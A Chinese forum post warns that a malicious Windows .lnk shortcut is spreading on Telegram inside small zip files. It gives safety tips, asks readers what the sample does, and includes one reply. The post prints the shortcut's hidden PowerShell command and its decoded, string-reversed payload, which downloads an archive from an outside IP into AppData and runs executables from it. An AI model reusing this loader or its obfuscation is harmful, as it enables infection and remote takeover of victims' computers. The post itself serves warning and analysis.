近期telegram有人大肆传播lnk病毒

Author: zs448 - Posted:1个月前 - View:544

文件特征如下描述

一个zip压缩包,名字任意。但是压缩包非常小,小于10KB。

点开后里面是lnk文件,该文件为Windows平台专用,本质上是可执行任意指令的快捷方式。点击后你的电脑会变成肉鸡,入侵者可随意远程控制你的电脑。

所以遇到体积过小的压缩包,你又在使用Windows平台的话,请务必不要打开!推荐去把Windows的隐藏已知后缀取消,不要点击陌生lnk文件。

同时,推荐前往Windows telegram客户端关闭自动下载。

通过中标的人把lnk文件分享出来,写的啥?有懂的没?

1、目标执行程序

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2、原始参数(只截取前200字符,太多了)

-NoP -ep Bypass -w h -EncodedCommand  JAByAGUAdgAgAD0AIAAnADsAIgBlAHgAZQAuAGQAcwBsAG8AbwB0AG0AdgBcAFwAQwBNAE0AXABcAHQAZgBvAHMAbwByAGMAaQBNAFwAXABBAFQAQQBEAFAAUABBADoAdgBuAGUAJAAiACAAJgA7ACIAZQB…

3、以下是解码后的PowerShell命令

$rev = ';"exe.dslootmv\\CMM\\tfosorciM\\ATADPPA:vne$" &;"exe.tropghc\\CMM\\tfosorciM\\ATADPPA:vne$" &;ecroF- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" metI-evomeR ;ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" htaPnoitanitseD- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" htaP- evihcrA-dnapxE;gnisraPcisaBesU- "piz.1IJIZ\\CMM\\tfosorciM\\ATADPPA:vne$" o- "piz.1IJIZ/541.821.221.}BS{$}vv{$}ca{$" lruc;}lluN-tuO|ecroF- "CMM\\tfosorciM\\ATADPPA:vne$" yrotceriD epyT- metI-weN  {))"CMM\\tfosorciM\\ATADPPA:vne$" htaP-tseT( ton-( fi ;gnisraPcisaBesU- "txt.明说\\htaPlacol$" o- "txt.明说/541.821.221.}BS{$}vv{$}ca{$" lruc;"431//:"=BS$;"gnisra"=ll$;"Pci"=kk$;"saB"=jj$;"esU-"=hh$;"p"=vv$;"tth"=ca$;"jdh"=jdh$;"juh"=juh$;"jDSh"=ERh$;"ertry"=dsef$;"eeewssy"=ssef$;"eesarreefdssy"=ssgfdf$;"eesacvd"=ssghild$;"teydhs"=DHSTRY$;"tolyghbs"=erfgy$;"dpolls"=fedsaa$;"dujtd"=ADSdRFD$;"sarfvc"=uuuhfb$;"sartrrtkj"=utvvyyyyhnd$;"sarKJHj"=utvvyyyHBnA$;"sarKFHj"=utADHBnA$;"sar"=utA$;"sarK"=utAd$;ecroF- "knl.txt.明说\\htaPlacol$" htaP- metI-evomeR ;htaP.)noitacoL-teG( = htaPlacol$'
$cmm = -join $rev[-1..-$rev.Length]
Invoke-Expression $cmm

4、图标伪装成下列形式

.\1.txt

5、文件描述(可能是垃圾数据)

JMjbdLxqqm1lDDqudandas

6、文件的一些时间信息

  • 创建时间 : 2023-06-26 10:13:29.233510+00:00
  • 修改时间 : 2023-06-26 10:13:29.233510+00:00
  • 访问时间 : 2023-06-26 10:13:29.233510+00:00

7、原始文件大小显示为323584字节

8、分布式链接追踪信息(机器标识等)

  • 机器标识符 : TESTMACHINE01234
  • Droid卷标识: 0C703587-9D5D-40F3-8021-0578FC96DDFD
  • Droid文件标识: D811239A-DCEC-4EF7-B3C9-55B9814E0699
0 人点赞  ∙  0 人收藏  
加入收藏 点赞 我要评论

目前共有 21 条回复

12
aerph
- aerph - 1个月前

用win版纸飞机的应该容易中招,像我基本不接触这软件,不会碰到这种情况,不止这样,不熟悉的东西不要轻易去点它,问题应该不大的,就算中招了也不怕,只有系统有备份,随时恢复就行

12